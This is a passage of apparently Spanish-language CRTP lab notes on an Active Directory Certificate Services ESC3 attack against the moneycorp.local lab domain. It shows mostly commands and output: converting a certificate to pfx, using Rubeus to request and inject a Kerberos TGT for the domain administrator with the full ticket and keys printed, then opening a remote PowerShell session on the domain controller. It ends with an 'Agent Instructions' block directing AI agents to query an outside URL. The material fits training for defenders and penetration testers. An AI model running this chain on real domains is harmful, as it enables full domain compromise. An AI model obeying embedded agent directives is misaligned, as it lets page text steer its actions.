AQH/BAQDAgeAMDUGCSsGAQQBgjcVCgQoMCYwCgYIKwYBBQUHAwQwDAYKKwYBBAGC NwoDBDAKBggrBgEFBQcDAjAdBgNVHQ4EFgQUSFsyoApfVaR3I4BsP6t6vT6ndfUw HwYDVR0jBBgwFoAU0f6NCqf6tDKfNvwguPfLnmjFRe0wgdgGA1UdHwSB0DCBzTCB yqCBx6CBxIaBwWxkYXA6Ly8vQ049bW9uZXljb3JwLU1DT1JQLURDLUNBLENOPW1j b3JwLWRjLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2 aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1vbmV5Y29ycCxEQz1sb2NhbD9jZXJ0 aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJp YnV0aW9uUG9pbnQwgcsGCCsGAQUFBwEBBIG+MIG7MIG4BggrBgEFBQcwAoaBq2xk YXA6Ly8vQ049bW9uZXljb3JwLU1DT1JQLURDLUNBLENOPUFJQSxDTj1QdWJsaWMl MjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERD PW1vbmV5Y29ycCxEQz1sb2NhbD9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xh c3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTA4BgNVHREEMTAvoC0GCisGAQQBgjcU AgOgHwwdYWRtaW5pc3RyYXRvckBtb25leWNvcnAubG9jYWwwTAYJKwYBBAGCNxkC BD8wPaA7BgorBgEEAYI3GQIBoC0EK1MtMS01LTIxLTMzNTYwNjEyMi05NjA5MTI4 NjktMzI3OTk1MzkxNC01MDAwDQYJKoZIhvcNAQELBQADggEBAD+O48hX4Hq0kOgT xJh2+T9VfZs4NOk0MmzDzmhvOR1GxXsGzjQ0V9dUQjc8kWdqLQu+KGPuM0na1yKv xQ7whHTX6XOSOy0j3tJqskzFF7sGmr49fd/G8Ch/DRCctETnpYmFlme2RzD9Viht x6PI5ZICx1Idd8Bh/R6Jle7C3871ingPbIBimuGoYMJPtnSSRi6dpbq6A67q1QIG CAZkhg+iVIkxj8+2ktYQer7Ph5owFGug3pDKcWfvEw9NO4nbDDGU/XKVoOJEBu/o gPO+wNmW/abq0eJwyUXCmw5ZpHMquoySjtKKcL5WB1kdtMFjl/OuE2Ls5VaD5qNR 2DRbl2k= -----END CERTIFICATE----- ``` Guardamos cert.pem en un archivo y volvemos a convertir a pfx. ``` PS C:\AD\Tools\openssl> .\openssl.exe pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc3user.pfx WARNING: can't open config file: /usr/local/ssl/openssl.cnf Enter Export Password: Verifying - Enter Export Password: PS C:\AD\Tools\openssl> ``` Ahora, usamos Rubeus para cargar el pfx y obtener un ticket para administrator. ``` PS C:\AD\Tools\openssl> ..\Rubeus.exe asktgt /user:moneycorp.local\administrator /certificate:esc3user.pfx /dc:mcorp-dc.moneycorp.local /password:SecretPass@123 /ptt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.1 [*] Action: Ask TGT [*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=moneycorp, DC=local [*] Building AS-REQ (w/ PKINIT preauth) for: 'moneycorp.local\administrator' [*] Using domain controller: 172.16.1.1:88 [+] TGT request successful! [*] base64(ticket.kirbi): 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 [+] Ticket successfully imported! ServiceName : krbtgt/moneycorp.local ServiceRealm : MONEYCORP.LOCAL UserName : administrator UserRealm : MONEYCORP.LOCAL StartTime : 3/4/2024 7:32:24 AM EndTime : 3/4/2024 5:32:24 PM RenewTill : 3/11/2024 8:32:24 AM Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : rc4_hmac Base64(key) : k2JTw+0tX/nDY1q8p5OQXA== ASREP (key) : DD25ADB77E7B591EE7AE44FB9E931596 ``` Y luego podemos validar que el ticket funciona correctamente. ``` PS C:\AD\Tools\openssl> ls \\mcorp-dc\c$ Directory: \\mcorp-dc\c$ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 5/8/2021 1:20 AM PerfLogs d-r--- 11/10/2022 9:53 PM Program Files d----- 5/8/2021 2:40 AM Program Files (x86) d-r--- 11/11/2022 6:33 AM Users d----- 1/10/2024 1:35 AM Windows PS C:\AD\Tools\openssl> Enter-PSSession -Computername mcorp-dc [mcorp-dc]: PS C:\Users\Administrator\Documents> whoami mcorp\administrator [mcorp-dc]: PS C:\Users\Administrator\Documents> hostname mcorp-dc [mcorp-dc]: PS C:\Users\Administrator\Documents> ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://infra.desdes.xyz/group-1/crtp-notes/learning-objective-21/ad-cs-esc3.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.